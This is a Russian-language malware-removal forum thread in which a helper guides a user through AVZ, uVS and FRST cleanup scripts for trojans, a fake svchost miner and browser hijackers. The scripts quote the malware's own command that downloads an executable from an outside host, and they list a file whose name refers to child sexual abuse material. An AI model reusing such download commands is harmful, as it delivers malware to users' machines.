CureIt не лечит найденные вирусы. [not-a-virus:HEUR:AdWare.Win32.Generic, Trojan.Win32.Agent.neszij ]

Printable View

23.08.2017, 18:46
Tulio

CureIt не лечит найденные вирусы. [not-a-virus:HEUR:AdWare.Win32.Generic, Trojan.Win32.Agent.neszij ]

Здравствуйте. Компьютер тормозит, сканирую CureIt, находит 9 троянов, но не может обезвредить угрозы. В безопасном режиме тоже самое. Помогите.
23.08.2017, 18:50
Info_bot

Уважаемый(ая) [B]Tulio[/B], спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
24.08.2017, 18:21
Tulio

За сутки даже лог ни кто не посмотрел :(
Сделал сканирование и чистку [B]AdwCleaner[/B], логи во вложении. Проблема с загрузкой процессора не исчезла. Грузит процесс [B]svchost.exe.exe [/B]порядка 50% загрузки.
26.08.2017, 23:36
Vvvyg

[url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ[/url]:[code]begin
TerminateProcessByName('c:\windows\microsoft\svchost.exe');
TerminateProcessByName('C:\Windows\Microsoft\svchost.exe.exe');
TerminateProcessByName('c:\users\Александр и Ко\appdata\local\yc\application\yc.exe');
StopService('Ea3Host');
StopService('SvcHost Service Host');
QuarantineFile('c:\windows\microsoft\svchost.exe', '');
QuarantineFile('C:\Windows\Microsoft\svchost.exe.exe', '');
QuarantineFile('c:\users\Александр и Ко\appdata\local\yc\application\yc.exe', '');
QuarantineFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\chrome_elf.dll', '');
QuarantineFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\chrome_child.dll', '');
QuarantineFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\libglesv2.dll', '');
QuarantineFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\libegl.dll', '');
QuarantineFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\chrome.dll', '');
QuarantineFile('C:\Windows\system32\Ea3Host.exe', '');
QuarantineFile('C:\Windows\system32\GroupPolicy\Machine\Registry.pol', '');
QuarantineFile('C:\ProgramData\Microsoft\Adobe\Flash Player\FB433554-A7A6-4743-BB9D-987243A435E0\3B3AD1E9-23AF-4D20-B9F5-9A33EFFF78EB.exe', '');
QuarantineFile('C:\Users\04CA~1\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\04CA~1\AppData\Roaming\curl\curl.exe', '');
QuarantineFile('C:\Users\04CA~1\AppData\Roaming\curl\curl_7_54.exe', '');
QuarantineFile('C:\Users\04CA~1\AppData\Roaming\curl\curl.exe', '');
QuarantineFile('C:\Users\Александр и Ко\AppData\Local\etdctrl\etdctrl.exe', '');
QuarantineFile('C:\Users\Александр и Ко\AppData\Roaming\Microsoft\msi.exe', '');
QuarantineFile('C:\Users\Александр и Ко\appdata\local\systemdir\nethost.exe', '');
QuarantineFile('C:\Users\Александр и Ко\appdata\roaming\curl\curl_7_54.exe', '');
QuarantineFile('C:\Users\Александр и Ко\appdata\roaming\windowsupdater\updater.exe', '');
DeleteFile('c:\windows\microsoft\svchost.exe', '32');
DeleteFile('C:\Windows\Microsoft\svchost.exe.exe', '32');
DeleteFile('c:\users\Александр и Ко\appdata\local\yc\application\yc.exe', '32');
DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\chrome_elf.dll', '32');
DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\chrome_child.dll', '32');
DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\libglesv2.dll', '32');
DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\libegl.dll', '32');
DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\chrome.dll', '32');
DeleteFile('C:\Windows\system32\Ea3Host.exe', '32');
DeleteFile('C:\Windows\system32\GroupPolicy\Machine\Registry.pol', '32');
DeleteFile('C:\ProgramData\Microsoft\Adobe\Flash Player\FB433554-A7A6-4743-BB9D-987243A435E0\3B3AD1E9-23AF-4D20-B9F5-9A33EFFF78EB.exe', '32');
DeleteFile('C:\Users\04CA~1\AppData\Roaming\curl\curl_7_54.exe', '32');
DeleteFile('C:\Users\04CA~1\AppData\Roaming\curl\curl.exe', '32');
DeleteFile('C:\Users\Александр и Ко\AppData\Local\Microsoft\Start Menu\Вoйти в Интeрнeт.lnk', '32');
DeleteFile('C:\Users\Александр и Ко\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Вoйти в Интeрнeт.lnk', '32');
DeleteFile('C:\Users\Александр и Ко\Favorites\Links\Интернет.url', '32');
DeleteFile('C:\Users\Александр и Ко\AppData\Local\etdctrl\etdctrl.exe', '32');
DeleteFile('C:\Users\Александр и Ко\AppData\Roaming\Microsoft\msi.exe', '32');
DeleteFile('C:\Users\Александр и Ко\appdata\local\systemdir\nethost.exe', '32');
DeleteFile('C:\Users\Александр и Ко\appdata\roaming\curl\curl_7_54.exe', '32');
DeleteFile('C:\Users\Александр и Ко\appdata\roaming\windowsupdater\updater.exe', '32');
DeleteService('Ea3Host');
DeleteService('SvcHost Service Host');
DeleteFileMask('c:\users\александр и ко\appdata\local\yc', '*', true);
DeleteFileMask('c:\users\04ca~1\appdata\roaming\curl', '*', true);
DeleteFileMask('c:\users\александр и ко\appdata\local\etdctrl', '*', true);
DeleteFileMask('c:\users\александр и ко\appdata\local\systemdir', '*', true);
DeleteFileMask('c:\users\александр и ко\appdata\roaming\curl', '*', true);
DeleteFileMask('c:\users\александр и ко\appdata\roaming\windowsupdater', '*', true);
DeleteDirectory('c:\users\александр и ко\appdata\local\yc');
DeleteDirectory('c:\users\04ca~1\appdata\roaming\curl');
DeleteDirectory('c:\users\александр и ко\appdata\local\systemdir');
DeleteDirectory('c:\users\александр и ко\appdata\roaming\curl');
DeleteDirectory('c:\users\александр и ко\appdata\roaming\windowsupdater');
ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "etdctrl" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
ExecuteFile('ipconfig.exe', '/flushdns', 0, 15000, true);
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'C');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'FB433554-A7A6-4743-BB9D-987243A435E0');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'ntbqumoxdt');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'ycAutoLaunch_185FADED47DCEBAE627D22511F053EEF');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run', 'FB433554-A7A6-4743-BB9D-987243A435E0');
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteRepair(21);
ExecuteWizard('SCU', 2, 2, true);
RebootWindows(true);
end.[/code]Компьютер перезагрузится.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

Перетащите лог Check_Browsers_LNK.log из папки Autologger на [url=http://dragokas.com/tools/ClearLNK.zip]утилиту ClearLNK[/url]. Отчёт о работе прикрепите.

Сделайте новый лог Autologger.

Сделайте лог [URL="http://virusinfo.info/showthread.php?t=146192&p=1041844&viewfull=1#post1041844"]Malwarebytes AdwCleaner[/URL].
04.09.2017, 15:16
Tulio

Сделано!
Похоже svchost.exe.exe исчез, остался в разгоне до 25% IAStorDataMgrSvc.exe - с ним надо что то делать? Готов к дальнейшим действиям, спасибо!
04.09.2017, 20:41
Vvvyg

Что-то особой разницы с исходными логами мало, всё на месте. Вы такую паузу не выдерживайте, иначе до НГ лечить будем.

Выполните скрипт в AVZ:[CODE]begin
ClearQuarantine;
TerminateProcessByName('c:\windows\microsoft\svchost.exe');
TerminateProcessByName('C:\Windows\Microsoft\svchost.exe.exe');
TerminateProcessByName('c:\users\Александр и Ко\appdata\local\yc\application\yc.exe');
StopService('Ea3Host');
StopService('SvcHost Service Host');
QuarantineFile('c:\windows\microsoft\svchost.exe', '');
QuarantineFile('C:\Windows\Microsoft\svchost.exe.exe', '');
QuarantineFile('C:\Windows\system32\Ea3Host.exe', '');
QuarantineFile('C:\Windows\system32\GroupPolicy\Machine\Registry.pol', '');
QuarantineFile('C:\ProgramData\Microsoft\Adobe\Flash Player\FB433554-A7A6-4743-BB9D-987243A435E0\3B3AD1E9-23AF-4D20-B9F5-9A33EFFF78EB.exe', '');
QuarantineFile('C:\Users\04CA~1\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\04CA~1\AppData\Roaming\curl\curl.exe', '');
QuarantineFile('C:\Users\04CA~1\AppData\Roaming\curl\curl_7_54.exe', '');
QuarantineFile('C:\Users\04CA~1\AppData\Roaming\curl\curl.exe', '');
QuarantineFile('C:\Users\Александр и Ко\AppData\Local\etdctrl\etdctrl.exe', '');
QuarantineFile('C:\Users\Александр и Ко\AppData\Roaming\Microsoft\msi.exe', '');
QuarantineFile('C:\Users\Александр и Ко\appdata\local\systemdir\nethost.exe', '');
QuarantineFile('C:\Users\Александр и Ко\appdata\roaming\curl\curl_7_54.exe', '');
QuarantineFile('C:\Users\Александр и Ко\appdata\roaming\windowsupdater\updater.exe', '');
DeleteFile('c:\windows\microsoft\svchost.exe', '32');
DeleteFile('C:\Windows\Microsoft\svchost.exe.exe', '32');
DeleteFile('c:\users\Александр и Ко\appdata\local\yc\application\yc.exe', '32');
DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\chrome_elf.dll', '32');
DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\chrome_child.dll', '32');
DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\chrome.dll', '32');
DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\libglesv2.dll', '32');
DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\libegl.dll', '32');
DeleteFile('C:\Windows\system32\Ea3Host.exe', '32');
DeleteFile('C:\Windows\system32\GroupPolicy\Machine\Registry.pol', '32');
DeleteFile('C:\ProgramData\Microsoft\Adobe\Flash Player\FB433554-A7A6-4743-BB9D-987243A435E0\3B3AD1E9-23AF-4D20-B9F5-9A33EFFF78EB.exe', '32');
DeleteFile('C:\Users\04CA~1\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\04CA~1\AppData\Roaming\curl\curl.exe', '32');
DeleteFile('C:\Users\04CA~1\AppData\Roaming\curl\curl_7_54.exe', '32');
DeleteFile('C:\Users\04CA~1\AppData\Roaming\curl\curl.exe', '32');
DeleteFile('C:\Users\Александр и Ко\AppData\Local\etdctrl\etdctrl.exe', '32');
DeleteFile('C:\Users\Александр и Ко\AppData\Roaming\Microsoft\msi.exe', '32');
DeleteFile('C:\Users\Александр и Ко\appdata\local\systemdir\nethost.exe', '32');
DeleteFile('C:\Users\Александр и Ко\appdata\roaming\curl\curl_7_54.exe', '32');
DeleteFile('C:\Users\Александр и Ко\appdata\roaming\windowsupdater\updater.exe', '32');
DeleteService('Ea3Host');
DeleteService('SvcHost Service Host');
DeleteFileMask('c:\users\александр и ко\appdata\local\yc', '*', true);
DeleteFileMask('c:\users\04ca~1\appdata\roaming\curl', '*', true);
DeleteFileMask('c:\users\александр и ко\appdata\local\etdctrl', '*', true);
DeleteFileMask('c:\users\александр и ко\appdata\local\systemdir', '*', true);
DeleteFileMask('c:\users\александр и ко\appdata\roaming\curl', '*', true);
DeleteFileMask('c:\users\александр и ко\appdata\roaming\windowsupdater', '*', true);
DeleteDirectory('c:\users\александр и ко\appdata\local\yc');
DeleteDirectory('c:\users\04ca~1\appdata\roaming\curl');
DeleteDirectory('c:\users\александр и ко\appdata\local\systemdir');
DeleteDirectory('c:\users\александр и ко\appdata\roaming\curl');
DeleteDirectory('c:\users\александр и ко\appdata\roaming\windowsupdater');
ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "etdctrl" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'C');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'FB433554-A7A6-4743-BB9D-987243A435E0');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'ntbqumoxdt');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'ycAutoLaunch_185FADED47DCEBAE627D22511F053EEF');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run', 'FB433554-A7A6-4743-BB9D-987243A435E0');
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteRepair(21);
ExecuteFile('ipconfig.exe', '/flushdns', 0, 15000, true);
RebootWindows(true);
end.[/CODE]
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

Скачайте утилиту Universal Virus Sniffer [URL="https://yadi.sk/d/6A65LkI1WEuqC"]отсюда[/URL] и [url=http://virusinfo.info/showthread.php?t=121767]сделайте полный образ автозапуска uVS[/url].
05.09.2017, 19:13
Tulio

[QUOTE=Vvvyg;1463071]Вы такую паузу не выдерживайте, иначе до НГ лечить будем.
[/QUOTE]
Отдыхал в тёплых краях, теперь буду оперативным.

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

Как удалить лишние файлы в менеджере вложений? Не могу прикрепить лог uVS из-за превышения лимита, он 770кб весит в архиве.
05.09.2017, 21:08
Vvvyg

Загрузите его в доступное облачное хранилище или на файлообменник (rghost.ru, например) и дайте ссылку в теме.
05.09.2017, 21:26
Tulio

Так подойдёт? [URL="https://yadi.sk/d/3KOkPMAv3MdXV3"]https://yadi.sk/d/3KOkPMAv3MdXV3[/URL]
05.09.2017, 21:53
Vvvyg

Вполне.

Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):[code];uVS v4.0.10 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
;------------------------autoscript---------------------------
cexec tools\CreateRestorePoint.exe BeforeCure
zoo %Sys32%\EA3HOST.EXE
addsgn B6653BBE7526C5362FCCE63830EC024DACC6D8FEC179F3003D9575B2509EF808073F82EE7E559D496A38848F4616F3EA5ADFE8419C25A5E92277A4674E42063B 8 Trojan.LoadMoney.2470 [DrWeb] 7

chklst
delvir

delref %SystemDrive%\USERS\�� \APPDATA\ROAMING\421RL31GSNMGLRPGJWGCKY.EXE
delref %SystemDrive%\USERS\�� \APPDATA\ROAMING\DEFW7RWUTKSKBBBIEOVKN.EXE
delref %SystemDrive%\USERS\�� \APPDATA\ROAMING\HC3GC2WOVMEA75N7MALUIQN.EXE
delref %SystemDrive%\USERS\�� \APPDATA\ROAMING\LHCXGD2TFZVC9VO.EXE
delref %SystemDrive%\USERS\�� \APPDATA\ROAMING\LUMNBZPS6FFZMGGL.EXE
delref %SystemDrive%\USERS\�� \APPDATA\ROAMING\U4MCYRLX2OCBO4PR8IU.EXE
delref HTTP://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DCPEGCOPCFAJIIIBIDLAELHJJBLPEFBJK%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DNBIFDKMDOJGMPMOPDEBNJCOBEKGDONCN%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTP://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DNECFMKPLPMINFJAGBLFABGGOMDPAAKAN%26INSTALLSOURCE%3DONDEMAND%26UC
delref %SystemDrive%\USERS\АЛЕКСАНДР И КО\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 2\EXTENSIONS\BGBGNHMFBCIFPKJOFOOJFPLMFKMAIADN\11.0.25_0\ДОМАШНЯЯ СТРАНИЦА MAIL.RU
delref %SystemDrive%\USERS\АЛЕКСАНДР И КО\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 2\EXTENSIONS\BHJHNAFPIILPFFHGLAJCAEPJBNBJEMCI\12.0.23_0\ПОИСК MAIL.RU
delref %SystemDrive%\USERS\АЛЕКСАНДР И КО\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 2\EXTENSIONS\BPGANGMFFJCOFIKNIBCMFJIONICOHFGJ\4.0.5_0\ВИЗУАЛЬНЫЕ ЗАКЛАДКИ MAIL.RU
delref %SystemDrive%\USERS\АЛЕКСАНДР И КО\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 2\EXTENSIONS\CPEGCOPCFAJIIIBIDLAELHJJBLPEFBJK\2.0.4.15_0\СТАРТОВАЯ — ЯНДЕКС
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\45.0.2454.101\RESOURCES\BOOKMARK_MANAGER\BOOKMARK MANAGER
delref %SystemDrive%\USERS\АЛЕКСАНДР И КО\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 2\EXTENSIONS\HCADGIJMEDBFGCIEGJOMFPJCDCHLHNIF\12.0.28_0\ДОМАШНЯЯ СТРАНИЦА MAIL.RU
delref %SystemDrive%\USERS\АЛЕКСАНДР И КО\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 2\EXTENSIONS\NBIFDKMDOJGMPMOPDEBNJCOBEKGDONCN\4.0.25_0\ПОИСК MAIL.RU
delref %SystemDrive%\USERS\АЛЕКСАНДР И КО\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 2\EXTENSIONS\NECFMKPLPMINFJAGBLFABGGOMDPAAKAN\2.0.3.15_0\ПОИСК ЯНДЕКСA
delref %SystemDrive%\USERS\АЛЕКСАНДР И КО\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 2\EXTENSIONS\NMMHKKEGCCAGDLDGIIMEDPICCMGMIEDA\1.0.0.3_0\ПЛАТЕЖНАЯ СИСТЕМА ИНТЕРНЕТ-МАГАЗИНА CHROME
apply

regt 27
regt 28
regt 29
;-------------------------------------------------------------

deltmp
;---------command-block---------
delref %SystemDrive%\USERS\АЛЕКСАНДР И КО\APPDATA\ROAMING\MICROSOFT\MSI.EXE
del %SystemDrive%\USERS\АЛЕКСАНДР И КО\DOWNLOADS\ADWCLEANER_4.000.EXE
del %SystemDrive%\USERS\АЛЕКСАНДР И КО\DOWNLOADS\ADWCLEANER_4.002.EXE
delref D:\PROGRAM FILES (X86)\INTERNET EXPLORER\IEXPLORE.EXE
delref НОВАЯ ПАПКА\PTHC_LOLIFUCK_10YO_KATRINA_-_DOGGYSTYLECP_EEB-E49___.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\QYERBVXRHIE\KQYPTFIFME.EXE
apply
czoo
restart[/code]
Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.
Компьютер перезагрузится.

В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше все в одном архиве).

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

[url=http://virusinfo.info/showthread.php?t=130567]Удалите вложения[/url], относящиеся к самым старым темам.
06.09.2017, 13:39
Tulio

Вложений: 2

Готово. Архив из uvs пришлось дополнительно запаковать в zip, иначе не отправлялось.
06.09.2017, 21:12
Vvvyg

Так Вы не по моей ссылке UVS скачали, там версия, которая как надо карантин пакует, и более новая, кстати.

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:[CODE]CreateRestorePoint:
GroupPolicy: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
SearchScopes: HKU\S-1-5-21-1785463621-1497758277-2574744706-1000 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/search?q={SearchTerms}&fr=iextn&gp=blackbear1
SearchScopes: HKU\S-1-5-21-1785463621-1497758277-2574744706-1000 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/search?q={SearchTerms}&fr=iextn&gp=blackbear1
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\shvrsae5.default -> Поиск@Mail.Ru
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\shvrsae5.default -> Поиск@Mail.Ru
FF Homepage: Mozilla\Firefox\Profiles\shvrsae5.default -> hxxp://mail.ru/cnt/10445?gp=811013
FF Keyword.URL: Mozilla\Firefox\Profiles\shvrsae5.default -> hxxp://go.mail.ru/distib/ep/?fr=ntg&product_id=%7BCD63AC64-B0D3-45E0-A4BA-4CDA2B1E9F7D%7D&gp=811014
CHR HomePage: Profile 2 -> mail.ru
CHR StartupUrls: Profile 2 -> "hxxp://mail.ru/cnt/10445?gp=811009"
CHR NewTab: Profile 2 -> Active:"chrome-extension://bpgangmffjcofiknibcmfjionicohfgj/visual-bookmarks.html"
CHR DefaultSearchURL: Profile 2 -> hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7BAC228B10-87AF-428B-B6A6-6A9B799812F4%7D&gp=811010
CHR DefaultSearchKeyword: Profile 2 -> go.mail.ru
CHR DefaultSuggestURL: Profile 2 -> hxxp://suggests.go.mail.ru/ff3?q={searchTerms}
CHR Profile: C:\Users\Александр и Ко\AppData\Local\Google\Chrome\User Data\System Profile [2017-08-22]
CHR HKLM-x32\...\Chrome\Extension: [bgbgnhmfbcifpkjofoojfplmfkmaiadn] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [bhjhnafpiilpffhglajcaepjbnbjemci] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [bpgangmffjcofiknibcmfjionicohfgj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [hcadgijmedbfgciegjomfpjcdchlhnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [hocdkcedpfejgmnoaheingaleckdlffn] - C:\ProgramData\Bcool\hocdkcedpfejgmnoaheingaleckdlffn.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [iifchhfnnmpdbibifmljnfjhpififfog] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [indjgiebmakhmnaplnlnanodkfiejfjd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [jkfblcbjfojmgagikhldeppgmgdpjkpl] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [kedfcojchlkbbjodianmnimklobmaaik] - C:\ProgramData\ADDICT-THING\kedfcojchlkbbjodianmnimklobmaaik.crx <not found>
2015-04-19 19:20 - 2015-04-19 19:20 - 000005872 _____ () C:\Users\Александр и Ко\AppData\Roaming\421RL31gSnMGlrpgjwGCkY
2015-04-20 21:05 - 2015-04-20 21:05 - 001579520 _____ () C:\Users\Александр и Ко\AppData\Roaming\421RL31gSnMGlrpgjwGCkY.exe
2015-04-14 23:28 - 2015-04-14 23:28 - 000004387 _____ () C:\Users\Александр и Ко\AppData\Roaming\defw7rwuTKSkbBBIEoVkn
2015-04-20 21:05 - 2015-04-20 21:05 - 001246720 _____ () C:\Users\Александр и Ко\AppData\Roaming\defw7rwuTKSkbBBIEoVkn.exe
2015-04-19 19:20 - 2015-04-19 19:20 - 000005872 _____ () C:\Users\Александр и Ко\AppData\Roaming\hC3gC2wOvMEA75n7MALuIQn
2015-04-20 21:05 - 2015-04-20 21:05 - 001579520 _____ () C:\Users\Александр и Ко\AppData\Roaming\hC3gC2wOvMEA75n7MALuIQn.exe
2015-04-14 23:28 - 2015-04-14 23:28 - 000004387 _____ () C:\Users\Александр и Ко\AppData\Roaming\LhCxgD2tFzvC9Vo
2015-04-20 21:05 - 2015-04-20 21:05 - 001246720 _____ () C:\Users\Александр и Ко\AppData\Roaming\LhCxgD2tFzvC9Vo.exe
2015-04-14 23:28 - 2015-04-14 23:28 - 000004387 _____ () C:\Users\Александр и Ко\AppData\Roaming\lumnBZpS6FfzMgGL
2015-04-20 21:05 - 2015-04-20 21:05 - 001246720 _____ () C:\Users\Александр и Ко\AppData\Roaming\lumnBZpS6FfzMgGL.exe
2012-05-09 19:22 - 2012-05-09 19:22 - 000393368 _____ (Media Labs Ltd.) C:\Users\Александр и Ко\AppData\Roaming\TicnoBar.ins
2015-04-19 19:20 - 2015-04-19 19:20 - 000005872 _____ () C:\Users\Александр и Ко\AppData\Roaming\U4mcYrLX2ocbO4Pr8Iu
2015-04-20 21:05 - 2015-04-20 21:05 - 001579520 _____ () C:\Users\Александр и Ко\AppData\Roaming\U4mcYrLX2ocbO4Pr8Iu.exe
2015-10-07 12:00 - 2015-10-07 12:00 - 000613255 _____ (CMI Limited) C:\Users\Александр и Ко\AppData\Local\nsi7B.tmp
2015-10-07 11:21 - 2015-10-07 11:21 - 000613255 _____ (CMI Limited) C:\Users\Александр и Ко\AppData\Local\nsj6C4E.tmp
2015-10-07 14:26 - 2015-10-07 14:26 - 000613255 _____ (CMI Limited) C:\Users\Александр и Ко\AppData\Local\nsnBB1C.tmp
ContextMenuHandlers1: [Glary Utilities] -> [CC]{B3C418F8-922B-4faf-915E-59BC14448CF7} => -> No File
ContextMenuHandlers2: [Glary Utilities] -> [CC]{B3C418F8-922B-4faf-915E-59BC14448CF7} => -> No File
ContextMenuHandlers6: [Glary Utilities] -> [CC]{B3C418F8-922B-4faf-915E-59BC14448CF7} => -> No File
Task: {C60C9AFB-525D-453C-83F6-09F622CE6E6D} - \MSI -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Temp:7717F034 [120]
AlternateDataStreams: C:\ProgramData\Temp:D1B5B4F1 [112]
